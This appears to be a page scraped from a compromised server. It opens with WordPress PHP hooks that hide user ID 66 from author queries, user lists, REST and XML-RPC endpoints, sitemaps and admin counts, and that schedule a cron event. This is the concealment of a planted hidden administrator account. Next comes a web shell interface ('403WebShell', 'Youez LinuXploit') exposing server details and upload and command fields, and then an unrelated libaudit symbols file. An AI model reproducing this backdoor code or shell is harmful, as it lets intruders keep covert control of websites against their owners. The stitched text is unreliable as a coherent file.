add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libaudit1:arm64.symbols
libaudit.so.1 libaudit1 #MINVER#
* Build-Depends-Package: libaudit-dev
 __audit_send@Base 1:2.8.2
 _audit_archadded@Base 1:2.2.1
 _audit_elf@Base 1:2.2.1
 _audit_exeadded@Base 1:2.5.1
 _audit_filterfsadded@Base 1:2.8
 _audit_permadded@Base 1:2.2.1
 _audit_syscalladded@Base 1:2.2.1
 audit_action_to_name@Base 1:2.2.1
 audit_add_rule_data@Base 1:2.2.1
 audit_add_watch@Base 1:2.2.1
 audit_add_watch_dir@Base 1:2.2.1
 audit_can_control@Base 1:2.6.1
 audit_can_read@Base 1:2.6.1
 audit_can_write@Base 1:2.6.1
 audit_close@Base 1:2.2.1
 audit_delete_rule_data@Base 1:2.2.1
 audit_detect_machine@Base 1:2.2.1
 audit_determine_machine@Base 1:2.3.6
 audit_elf_to_machine@Base 1:2.2.1
 audit_encode_nv_string@Base 1:2.2.1
 audit_encode_value@Base 1:2.2.1
 audit_errno_to_name@Base 1:2.2.1
 audit_field_to_name@Base 1:2.2.1
 audit_flag_to_name@Base 1:2.2.1
 audit_format_signal_info@Base 1:3.0~alpha9
 audit_fstype_to_name@Base 1:2.8
 audit_ftype_to_name@Base 1:2.2.1
 audit_get_features@Base 1:2.5.1
 audit_get_reply@Base 1:2.2.1
 audit_get_session@Base 1:2.7.7
 audit_getloginuid@Base 1:2.2.1
 audit_is_enabled@Base 1:2.2.1
 audit_log_acct_message@Base 1:2.2.1
 audit_log_semanage_message@Base 1:2.2.1
 audit_log_user_avc_message@Base 1:2.2.1
 audit_log_user_comm_message@Base 1:2.2.1
 audit_log_user_command@Base 1:2.2.1
 audit_log_user_message@Base 1:2.2.1
 audit_machine_to_elf@Base 1:2.2.1
 audit_machine_to_name@Base 1:2.2.1
 audit_make_equivalent@Base 1:2.2.1
 audit_msg@Base 1:2.2.1
 audit_msg_type_to_name@Base 1:2.2.1
 audit_name_to_action@Base 1:2.2.1
 audit_name_to_errno@Base 1:2.2.1
 audit_name_to_field@Base 1:2.2.1
 audit_name_to_flag@Base 1:2.2.1
 audit_name_to_fstype@Base 1:2.8
 audit_name_to_ftype@Base 1:2.2.1
 audit_name_to_machine@Base 1:2.2.1
 audit_name_to_msg_type@Base 1:2.2.1
 audit_name_to_syscall@Base 1:2.2.1
 audit_name_to_uringop@Base 1:3.1.1
 audit_number_to_errmsg@Base 1:2.2.1
 audit_open@Base 1:2.2.1
 audit_operator_to_symbol@Base 1:2.2.1
 audit_request_features@Base 1:2.4
 audit_request_rules_list_data@Base 1:2.2.1
 audit_request_signal_info@Base 1:2.2.1
 audit_request_status@Base 1:2.2.1
 audit_reset_backlog_wait_time_actual@Base 1:3.0
 audit_reset_lost@Base 1:2.7.7
 audit_rule_create_data@Base 1:3.0~alpha9
 audit_rule_fieldpair_data@Base 1:2.2.1
 audit_rule_free_data@Base 1:2.2.1
 audit_rule_init_data@Base 1:3.0~alpha9
 audit_rule_interfield_comp_data@Base 1:2.2.1
 audit_rule_io_uringbyname_data@Base 1:3.1.1
 audit_rule_syscall_data@Base 1:2.2.1
 audit_rule_syscallbyname_data@Base 1:2.2.1
 audit_send@Base 1:2.2.1
 audit_set_backlog_limit@Base 1:2.2.1
 audit_set_backlog_wait_time@Base 1:2.4.2
 audit_set_enabled@Base 1:2.2.1
 audit_set_failure@Base 1:2.2.1
 audit_set_feature@Base 1:2.4
 audit_set_loginuid_immutable@Base 1:2.4
 audit_set_pid@Base 1:2.2.1
 audit_set_rate_limit@Base 1:2.2.1
 audit_setloginuid@Base 1:2.2.1
 audit_syscall_to_name@Base 1:2.2.1
 audit_trim_subtrees@Base 1:2.2.1
 audit_update_watch_perms@Base 1:2.2.1
 audit_uringop_to_name@Base 1:3.1.1
 audit_value_needs_encoding@Base 1:2.2.1
 get_auditfail_action@Base 1:2.2.1
 set_aumessage_mode@Base 1:2.2.1

Youez - 2016 - github.com/yon3zu
LinuXploit